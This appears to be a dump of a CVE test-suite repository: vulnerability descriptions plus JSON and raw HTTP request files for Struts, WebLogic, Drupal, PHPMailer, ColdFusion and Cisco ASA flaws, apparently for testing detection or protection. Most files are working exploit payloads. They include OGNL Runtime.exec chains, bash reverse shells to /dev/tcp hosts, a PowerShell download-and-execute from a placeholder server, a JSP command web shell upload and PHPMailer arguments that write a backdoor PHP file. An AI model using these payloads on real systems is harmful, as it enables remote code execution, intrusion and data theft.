3 | are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows
4 | unauthenticated attacker with network access via HTTP to compromise Oracle
5 | WebLogic Server. Successful attacks of this vulnerability can result in
6 | takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality,
7 | Integrity and Availability impacts). CVSS Vector:
8 | (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: WLS Core Components). Supported versions that are
3 | affected are 10.3.6.0, 12.1.3.0 and 12.2.1.3. Easily exploitable vulnerability
4 | allows unauthenticated attacker with network access via T3 to compromise
5 | Oracle WebLogic Server. Successful attacks of this vulnerability can result in
6 | takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality,
7 | Integrity and Availability impacts). CVSS Vector:
8 | (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2019-2729/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: Web Services). Supported versions that are affected
3 | are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability
4 | allows unauthenticated attacker with network access via HTTP to compromise
5 | Oracle WebLogic Server. Successful attacks of this vulnerability can result in
6 | takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality,
7 | Integrity and Availability impacts). CVSS Vector:
8 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2012-1007/test1.txt:
--------------------------------------------------------------------------------
1 | -----------------------------41701161044225432961947041\r\n
2 | Content-Disposition: form-data; name="theText"\r\n
3 | \r\n
4 | \r\n
5 | -----------------------------41701161044225432961947041\r\n
6 | Content-Disposition: form-data; name="theFile"; filename=""\r\n
7 | Content-Type: application/octet-stream\r\n
8 | \r\n
9 | \r\n
10 | -----------------------------41701161044225432961947041\r\n
11 | Content-Disposition: form-data; name="filePath"\r\n
12 | \r\n
13 | \r\n
14 | -----------------------------41701161044225432961947041--\r\n
15 |
--------------------------------------------------------------------------------
/tests/CVE-2016-4438/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=netstat -an",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | }
9 | ]
10 |
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close",
8 | "Content-Type": "multipart/form-data; boundary=---------------------------24464570528145",
9 | "Content-Length": "303",
10 | "Upgrade-Insecure-Requests": "1"
11 | },
12 | "Data-File": "test1.txt",
13 | "Reference": "https://github.com/vah13/CVE-2018-15961"
14 | }
15 | ]
16 |
--------------------------------------------------------------------------------
/tests/CVE-2018-20062/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/noneCms/public/?s=index/\\think\\Request/input&filter=phpinfo&data=1",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://github.com/nangge/noneCms/issues/21"
9 | },
10 | {
11 | "Method": "GET",
12 | "URI": "/?s=index/\\think\\Request/input&filter=phpinfo&data=1",
13 | "Headers": {
14 | "User-Agent": "Mozilla/5.0"
15 | },
16 | "Reference": "https://github.com/nangge/noneCms/issues/21"
17 | }
18 | ]
19 |
--------------------------------------------------------------------------------
/tests/CVE-2016-10033/test1.txt:
--------------------------------------------------------------------------------
1 | ------WebKitFormBoundaryzXJpHSq4mNy35tHe
2 | Content-Disposition: form-data; name="action"
3 |
4 | submit
5 | ------WebKitFormBoundaryzXJpHSq4mNy35tHe
6 | Content-Disposition: form-data; name="name"
7 |
8 |
9 | ------WebKitFormBoundaryzXJpHSq4mNy35tHe
10 | Content-Disposition: form-data; name="email"
11 |
12 | vulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php
13 | ------WebKitFormBoundaryzXJpHSq4mNy35tHe
14 | Content-Disposition: form-data; name="message"
15 |
16 | Pwned
17 | ------WebKitFormBoundaryzXJpHSq4mNy35tHe--
--------------------------------------------------------------------------------
/tests/CVE-2017-17672/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/vb533/ajax/api/template/cacheTemplates",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close",
8 | "Content-Type": "application/x-www-form-urlencoded",
9 | "Content-Length": "125"
10 | },
11 | "Data": {
12 | "templates[]": "1&templateidlist=O:20:\"vB_Image_ImageMagick\":1:{s:20:\"%00*%00imagefilelocation\";s:13:\"/path/to/file\";}"
13 | },
14 | "Reference": "https://ssd-disclosure.com/archives/3573"
15 | }
16 | ]
--------------------------------------------------------------------------------
/tests/CVE-2007-5416/description.txt:
--------------------------------------------------------------------------------
1 | Drupal 5.2 and earlier does not properly unset variables when the input data
2 | includes a numeric parameter with a value matching an alphanumeric parameter's
3 | hash value, which allows remote attackers to execute arbitrary PHP code by
4 | invoking the drupal_eval function through a callback parameter to the default
5 | URI, as demonstrated by the _menu[callbacks][1][callback] parameter. NOTE: it
6 | could be argued that this vulnerability is due to a bug in the unset PHP
7 | command (CVE-2006-3017) and the proper fix should be in PHP; if so, then this
8 | should not be treated as a vulnerability in Drupal.
--------------------------------------------------------------------------------
/tests/CVE-2010-1870/description.txt:
--------------------------------------------------------------------------------
1 | The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0
2 | through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other
3 | products, uses a permissive whitelist, which allows remote attackers to modify
4 | server-side context objects and bypass the "#" protection mechanism in
5 | ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root,
6 | (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations,
7 | (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context
8 | variables, a different vulnerability than CVE-2008-6504.
--------------------------------------------------------------------------------
/tests/CVE-2015-1398/description.txt:
--------------------------------------------------------------------------------
1 | Multiple directory traversal vulnerabilities in Magento Community Edition (CE)
2 | 1.9.1.0 and Enterprise Edition (EE) 1.14.1.0 allow remote authenticated users
3 | to include and execute certain PHP files via (1) .. (dot dot) sequences in the
4 | PATH_INFO to index.php or (2) vectors involving a block value in the
5 | ___directive parameter to the Cms_Wysiwyg controller in the Adminhtml module,
6 | related to the blockDirective function and the auto loading mechanism. NOTE:
7 | vector 2 might not cross privilege boundaries, since administrators might
8 | already have the privileges to execute code and upload files.
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/test2.txt:
--------------------------------------------------------------------------------
1 | {
2 | "_links": {
3 | "type": {
4 | "href": "http://192.168.1.1/rest/type/shortcut/default"
5 | }
6 | },
7 | "link": [{
8 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}",
9 | "value": "link"
10 | }]
11 | }
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/test1.txt:
--------------------------------------------------------------------------------
1 | {
2 | "_links": {
3 | "type": {
4 | "href": "http://192.168.1.1/rest/type/shortcut/default"
5 | }
6 | },
7 | "link": [{
8 | "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:8:\"ipconfig\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}",
9 | "value": "link"
10 | }]
11 | }
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Accept": "application/json, text/javascript, */*; q=0.01",
8 | "Accept-Language": "en-US,en;q=0.5",
9 | "X-Requested-With": "XMLHttpRequest",
10 | "Referer": "http://localhost/user/register",
11 | "Content-Length": "2377"
12 | },
13 | "Data-File": "test1.txt",
14 | "Reference": "https://github.com/thezdi/PoC/tree/master/Drupal"
15 | }
16 | ]
--------------------------------------------------------------------------------
/tests/CVE-2010-1870/test1.txt:
--------------------------------------------------------------------------------
1 | test=('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat -an\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
--------------------------------------------------------------------------------
/tests/CVE-2016-3081/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/some.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | }
9 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-10271/test3.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
15 |
16 |
17 |
18 |
--------------------------------------------------------------------------------
/tests/CVE-2017-10271/test2.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | /bin/bash
8 |
9 |
10 | -c
11 |
12 |
13 | bash -i >& /dev/tcp/10.0.0.1/21 0>&1
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
--------------------------------------------------------------------------------
/tests/CVE-2019-6340/description.txt:
--------------------------------------------------------------------------------
1 | Some field types do not properly sanitize data from non-form sources in Drupal
2 | 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary
3 | PHP code execution in some cases. A site is only affected by this if one of
4 | the following conditions is met: The site has the Drupal 8 core RESTful Web
5 | Services (rest) module enabled and allows PATCH or POST requests, or the
6 | site has another web services module enabled, like JSON:API in Drupal 8, or
7 | Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services
8 | module itself does not require an update at this time, but you should apply
9 | other contributed updates associated with this advisory if Services is in
10 | use.)
--------------------------------------------------------------------------------
/tests/CVE-2020-3452/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=+CSCOE+/portal_inc.lua",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://github.com/0x5ECF4ULT/CVE-2020-3452"
10 | },
11 | {
12 | "Method": "GET",
13 | "URI": "/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/useralert.html&default-language&lang=../",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Connection": "close"
17 | },
18 | "Reference": "https://github.com/3ndG4me/CVE-2020-3452-Exploit"
19 | }
20 | ]
--------------------------------------------------------------------------------
/tests/CVE-2012-0391/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter(\"C:/wwwroot/sec-consult.jsp\")).append(\"jsp+shell\").close())%2b'",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://www.exploit-db.com/exploits/18329"
10 | },
11 | {
12 | "Method": "GET",
13 | "URI": "/Test.action?id='%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Connection": "close"
17 | },
18 | "Reference": "https://www.exploit-db.com/exploits/18329"
19 | }
20 | ]
21 |
--------------------------------------------------------------------------------
/tests/CVE-2019-11580/description.txt:
--------------------------------------------------------------------------------
1 | Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin
2 | incorrectly enabled in release builds. Attackers who can send unauthenticated
3 | or authenticated requests to a Crowd or Crowd Data Center instance can exploit
4 | this vulnerability to install arbitrary plugins, which permits remote code
5 | execution on systems running a vulnerable version of Crowd or Crowd Data
6 | Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed
7 | version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for
8 | 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from
9 | version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version
10 | 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this
11 | vulnerability.
--------------------------------------------------------------------------------
/tests/CVE-2017-10271/test1.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 | cmd
9 |
10 |
11 | /c
12 |
13 |
14 | powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://SOMESERVERHERE/GOTPAYLOAD.ps1')
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/tests/CVE-2016-10033/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe"
8 | },
9 | "Data-File": "test1.txt",
10 | "Reference": "https://www.exploit-db.com/exploits/40968"
11 | },
12 | {
13 | "Method": "POST",
14 | "URI": "/",
15 | "Headers": {
16 | "User-Agent": "Mozilla/5.0",
17 | "Content-Type": "application/x-www-form-urlencoded"
18 | },
19 | "Data": {
20 | "email_from": "\"attacker\\\" -oQ/tmp/ -X/var/www/cache/phpcode.php some\"@email.com",
21 | "msg_body": ""
22 | },
23 | "Reference": "https://www.exploit-db.com/exploits/40970"
24 | }
25 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-0232/description.txt:
--------------------------------------------------------------------------------
1 | When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in
2 | Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is
3 | vulnerable to Remote Code Execution due to a bug in the way the JRE passes
4 | command line arguments to Windows. The CGI Servlet is disabled by default. The
5 | CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and
6 | will be disabled by default in all versions in response to this vulnerability).
7 | For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog
8 | (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html)
9 | and this archived MSDN blog
10 | (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/
11 | twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
--------------------------------------------------------------------------------
/tests/CVE-2018-3252/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/bea_wls_deployment_internal/DeploymentService",
5 | "Headers": {
6 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
7 | "Upgrade-Insecure-Requests": "1",
8 | "wl_request_type": "data_transfer_request",
9 | "username": "weblogic",
10 | "password": "weblogic",
11 | "serverName": "web-cve-tests",
12 | "deployment_request_id": "1",
13 | "Accept-Encoding": "gzip, deflate",
14 | "Accept-Language": "zh-CN,zh;q=0.8",
15 | "Connection": "close",
16 | "Content-Length": "3334",
17 | "User-Agent": "Mozilla/5.0"
18 | },
19 | "Data-Binary-File": "PoC-3252.ser",
20 | "Reference": "https://github.com/pyn3rd/CVE-2018-3252"
21 | }
22 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/common/FileAttachment.jsp?module=CustomLogin&view=Dashboard1",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36",
7 | "Content-Length": "508",
8 | "Content-Type": "multipart/form-data; boundary=----aaa",
9 | "Accept-Encoding": "gzip, deflate",
10 | "Accept-Language": "en-US,en;q=0.9,vi;q=0.8",
11 | "Cookie": "COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; JSESSIONID=66716A38326AE43058F4A71FCF4E1E42; JSESSIONIDSSO=6970EB5659C20DFF0CF5015D9C91448E; sdpcsrfcookie=ec189770-d1aa-4db3-9a97-36f4ab3db380",
12 | "Connection": "close"
13 | },
14 | "Data-File": "test1.txt",
15 | "Reference": "https://www.exploit-db.com/exploits/46413"
16 | }
17 | ]
--------------------------------------------------------------------------------
/tests/CVE-2010-1870/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/MyStruts.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data-File": "test1.txt",
10 | "Reference": "https://github.com/Lucifer1993/struts-scan/blob/master/struts-scan.py"
11 | },
12 | {
13 | "Method": "GET",
14 | "URI": "/MyStruts.action?test=('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1",
15 | "Headers": {
16 | "User-Agent": "Mozilla/5.0"
17 | },
18 | "Reference": "https://www.exploit-db.com/exploits/14360"
19 | }
20 | ]
21 |
--------------------------------------------------------------------------------
/tests/CVE-2015-6568/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/public/some-thing.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "multipart/form-data",
8 | "Connection": "close"
9 | },
10 | "File-Upload-Name": "some-thing.php",
11 | "File-Upload-File": "file1.txt",
12 | "Reference": "https://github.com/tbhaxor/web-exploits/blob/master/cve-2015/6568.py"
13 | },
14 | {
15 | "Method": "POST",
16 | "URI": "/public/some-thing.php",
17 | "Headers": {
18 | "User-Agent": "Mozilla/5.0",
19 | "Content-Type": "application/x-www-form-urlencoded",
20 | "Connection": "close"
21 | },
22 | "Data": {
23 | "cmd": "whoami"
24 | },
25 | "Reference": "https://github.com/tbhaxor/web-exploits/blob/master/cve-2015/6568.py"
26 | }
27 | ]
--------------------------------------------------------------------------------
/tests/CVE-2006-2743/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/?q=upload/js",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Referer": "http://localhost/drupal/?q=node/add/story",
8 | "Content-Type": "Content-Type: multipart/form-data; boundary=---------------------------7d6381c1b00a2",
9 | "Content-Length": "2526",
10 | "Cache-Control": "no-cache",
11 | "Connection": "Keep-Alive"
12 | },
13 | "Data-File": "test1.txt",
14 | "Reference": "https://www.exploit-db.com/exploits/1821"
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/drupalfiles/suntzu78063.php.jpg?cmd=+cat+.%2F.s%2Fdefault%2Fsettings.php",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0",
21 | "Connection": "close"
22 | },
23 | "Reference": "https://www.exploit-db.com/exploits/1821"
24 | }
25 | ]
26 |
--------------------------------------------------------------------------------
/.github/workflows/python3.yml:
--------------------------------------------------------------------------------
1 | name: Python 3
2 |
3 | on: [push]
4 |
5 | jobs:
6 | build:
7 |
8 | runs-on: ubuntu-latest
9 |
10 | steps:
11 | - uses: actions/checkout@v1
12 | - name: Set up Python 3.7
13 | uses: actions/setup-python@v1
14 | with:
15 | python-version: 3.7
16 | - name: Install dependencies
17 | run: |
18 | python -m pip install --upgrade pip
19 | pip install -r requirements.txt
20 | - name: Lint with flake8
21 | run: |
22 | pip install flake8
23 | # stop the build if there are Python syntax errors or undefined names
24 | flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
25 | # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
26 | flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
27 | - name: Run tests
28 | run: |
29 | make -B tests TEST_TARGET=https://riskdiscovery.com
--------------------------------------------------------------------------------
/tests/CVE-2020-3452/description.txt:
--------------------------------------------------------------------------------
1 | A vulnerability in the web services interface of Cisco Adaptive Security
2 | Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software
3 | could allow an unauthenticated, remote attacker to conduct directory traversal
4 | attacks and read sensitive files on a targeted system. The vulnerability is
5 | due to a lack of proper input validation of URLs in HTTP requests processed by
6 | an affected device. An attacker could exploit this vulnerability by sending a
7 | crafted HTTP request containing directory traversal character sequences to an
8 | affected device. A successful exploit could allow the attacker to view
9 | arbitrary files within the web services file system on the targeted device.
10 | The web services file system is enabled when the affected device is configured
11 | with either WebVPN or AnyConnect features. This vulnerability cannot be used to
12 | obtain access to ASA or FTD system files or underlying operating system (OS)
13 | files.
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test2.txt:
--------------------------------------------------------------------------------
1 | xxxx
2 |
3 |
4 |
5 | /bin/bash
6 |
7 |
8 | -c
9 |
10 |
11 | bash -i >& /dev/tcp/test/8080 0>&1
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test3.txt:
--------------------------------------------------------------------------------
1 | xxxx
2 |
3 |
4 |
5 | /bin/bash
6 |
7 |
8 | -c
9 |
10 |
11 | ls > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/tests/CVE-2014-0114/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/foobar?key1=class['classLoader'].resources.dirContext.docBase&key2=class.classLoader.resource",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/actionname.action?Class.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&Class.classLoader.resources.context.parent.pipeline.first.prefix=hack&Class.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&Class.classLoader.resources.context.parent.pipeline.first.fileDateFormat=12",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "POST",
18 | "URI": "/",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0",
21 | "Content-Type": "application/x-www-form-urlencoded"
22 | },
23 | "Data": {
24 | "anything": "class['classLoader'].resources.dirContext.docBase"
25 | }
26 | }
27 | ]
28 |
--------------------------------------------------------------------------------
/tests/CVE-2019-2618/test1.txt:
--------------------------------------------------------------------------------
1 | -----------------------------55365303813990412251182616919
2 | Content-Disposition: form-data; name="img"; filename="cmd.jsp"
3 | Content-Type: application/octet-stream
4 |
5 | <%@ page import="java.util.*,java.io.*"%>
6 | <%
7 | %>
8 |
9 |
10 |
14 |
15 | <%
16 | if (request.getParameter("cmd") != null) {
17 | out.println("Command: " + request.getParameter("cmd") + "
");
18 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
19 | OutputStream os = p.getOutputStream();
20 | InputStream in = p.getInputStream();
21 | DataInputStream dis = new DataInputStream(in);
22 | String disr = dis.readLine();
23 | while ( disr != null ) {
24 | out.println(disr);
25 | disr = dis.readLine();
26 | }
27 | }
28 | %>
29 |
30 |
31 |
32 | -----------------------------55365303813990412251182616919--
--------------------------------------------------------------------------------
/tests/CVE-2019-6703/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/wp-admin/admin-ajax.php?action=migla_getme",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": ""
10 | },
11 | {
12 | "Method": "POST",
13 | "URI": "/wp-admin/admin-ajax.php?action=migla_getme",
14 | "Headers": {
15 | "User-Agent": "Mozilla/5.0",
16 | "Content-Type": "application/x-www-form-urlencoded",
17 | "Connection": "close"
18 | },
19 | "Data": {
20 | "bogus": "parameter"
21 | },
22 | "Reference": ""
23 | },
24 | {
25 | "Method": "POST",
26 | "URI": "/wp-admin/admin-ajax.php",
27 | "Headers": {
28 | "User-Agent": "Mozilla/5.0",
29 | "Content-Type": "application/x-www-form-urlencoded",
30 | "Connection": "close"
31 | },
32 | "Data": {
33 | "action": "migla_getme"
34 | },
35 | "Reference": ""
36 | }
37 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/test5.txt:
--------------------------------------------------------------------------------
1 | xxxx
--------------------------------------------------------------------------------
/tests/CVE-2011-3923/description.txt:
--------------------------------------------------------------------------------
1 | OGNL provides, among other features, extensive expression evaluation
2 | capabilities. The vulnerability allows a malicious user to bypass all the
3 | protections (regex pattern, deny method invocation) built into the
4 | ParametersInterceptor, thus being able to inject a malicious expression in any
5 | exposed string variable for further evaluation.
6 |
7 | A similar behavior was already addressed in S2-003 and S2-005, but it turned
8 | out that the resulting fix based on whitelisting acceptable parameter names
9 | closed the vulnerability only partially. Regular expression in
10 | ParametersInterceptor matches top['foo'](0) as a valid expression, which OGNL
11 | treats as (top['foo'])(0) and evaluates the value of 'foo' action parameter as
12 | an OGNL expression. This lets malicious users put arbitrary OGNL statements
13 | into any String variable exposed by an action and have it evaluated as an OGNL
14 | expression and since OGNL statement is in HTTP parameter value attacker can use
15 | blacklisted characters (e.g. #) to disable method execution and execute arbitrary
16 | methods, bypassing the ParametersInterceptor and OGNL library protections.
--------------------------------------------------------------------------------
/tests/CVE-2016-1181/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/foobar?key1=class['classLoader'].resources.dirContext.docBase&key2=class.classLoader.resource",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/foobar?key1=multipartRequestHandler['classLoader'].resources.dirContext.docBase&key2=multipartRequestHandler.classLoader.resource",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | },
16 | {
17 | "Method": "GET",
18 | "URI": "/foobar?key1=resultValueMap['classLoader'].resources.dirContext.docBase&key2=resultValueMap.classLoader.resource",
19 | "Headers": {
20 | "User-Agent": "Mozilla/5.0"
21 | }
22 | },
23 | {
24 | "Method": "POST",
25 | "URI": "/",
26 | "Headers": {
27 | "User-Agent": "Mozilla/5.0",
28 | "Content-Type": "application/x-www-form-urlencoded"
29 | },
30 | "Data": {
31 | "anything": "class['classLoader'].resources.dirContext.docBase"
32 | }
33 | }
34 | ]
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
